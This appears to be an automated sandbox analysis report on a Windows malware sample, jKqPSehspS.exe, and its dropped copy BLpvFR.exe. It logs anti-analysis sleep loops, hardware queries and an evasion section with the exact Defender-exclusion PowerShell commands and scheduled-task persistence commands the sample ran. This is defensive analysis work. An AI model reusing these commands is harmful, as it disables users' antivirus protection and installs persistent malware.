                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 796Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3356Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep count: 35 > 30
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -32281802128991695s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7288Thread sleep count: 4765 > 30
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99781s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99641s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99516s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99406s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7288Thread sleep count: 5081 > 30
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99297s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99187s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98969s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98842s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98734s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98625s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98515s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98406s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98297s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98188s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98063s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97938s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97813s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97701s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97594s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97469s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97122s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96990s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96859s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96750s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96641s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96531s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96422s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96313s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96203s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96094s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95984s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95875s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95766s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95656s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95547s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95438s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95313s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95188s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95063s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94937s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94828s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94718s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94609s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94500s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94390s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94281s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 2708Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7528Thread sleep count: 7748 > 30
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7528Thread sleep count: 2094 > 30
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99314s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98639s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98311s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96314s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96013s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95784s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -93938s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99781
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99641
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99516
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99406
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99297
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99187
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99078
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98969
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98842
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98734
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98625
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98515
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98406
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98297
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98188
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98063
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97938
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97813
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97701
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97594
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97469
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97359
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97250
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97122
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96990
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96859
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96750
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96641
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96531
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96422
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96313
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96203
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96094
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95984
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95875
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95766
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95656
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95547
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95438
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95313
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95188
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95063
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94937
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94828
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94718
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94609
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94500
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94390
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94281
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94172
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99875
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99766
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99547
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99438
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99314
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99188
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99078
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98969
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98859
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98750
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98639
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98531
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98422
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98311
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98203
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98094
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97969
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97860
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97735
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97610
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97485
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97360
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97235
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97110
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96985
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96860
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96735
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96610
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 96485
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 96314
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 96013
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95906
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95784
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95672
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95563
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95453
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95344
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95235
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 95110
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94985
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94860
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94735
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94609
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94500
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94391
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94281
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94172
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 94047
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Thread delayed: delay time: 93938
Source: jKqPSehspS.exe, 00000009.00000002.3944382197.0000000001325000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: BLpvFR.exe, 0000000E.00000002.3943193696.000000000100E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Memory written: C:\Users\user\Desktop\jKqPSehspS.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Memory written: C:\Users\user\AppData\Roaming\BLpvFR.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BLpvFR.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp89B.tmp"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Process created: C:\Users\user\Desktop\jKqPSehspS.exe "C:\Users\user\Desktop\jKqPSehspS.exe"
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BLpvFR" /XML "C:\Users\user\AppData\Local\Temp\tmp1EF1.tmp"
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Process created: C:\Users\user\AppData\Roaming\BLpvFR.exe "C:\Users\user\AppData\Roaming\BLpvFR.exe"
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Users\user\Desktop\jKqPSehspS.exe VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
